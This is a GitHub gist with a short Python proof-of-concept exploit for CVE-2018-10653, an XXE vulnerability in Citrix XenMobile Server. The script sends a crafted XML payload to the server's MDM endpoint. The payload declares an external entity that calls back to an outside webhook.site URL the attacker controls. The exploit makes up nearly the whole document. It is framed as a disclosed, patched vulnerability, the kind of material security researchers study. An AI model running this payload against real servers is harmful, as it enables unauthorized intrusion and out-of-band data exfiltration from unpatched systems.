Last active
September 9, 2021 06:07
-
-
Save jonaslejon/bfcb05d76d09e0e3f9ef502b0263f2fb to your computer and use it in GitHub Desktop.
Citrix XenMobile XXE Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
## | |
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3 | |
## | |
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se | |
## Reported to Citrix 2017-10, patch released 2018-05 | |
## | |
import requests | |
import sys | |
from pprint import pprint | |
import uuid | |
# Surf to https://webhook.site and copy/paste the URL below. Used for XXE callback | |
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/" | |
id = str(uuid.uuid1()) | |
xml = '''<?xml version="1.0" encoding="UTF-8" standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' + WEBHOOK + id + '''/test.dtd">%j00t9; ]>''' | |
print(id) | |
response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False, | |
headers= | |
{'User-Agent': 'MDM/1.0', | |
'Connection': 'close', | |
'Content-Type': 'application/x-apple-aspen-mdm'}, | |
data=xml,stream=True | |
) | |
print(response.content) | |
print(response.text) | |
pprint(response) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment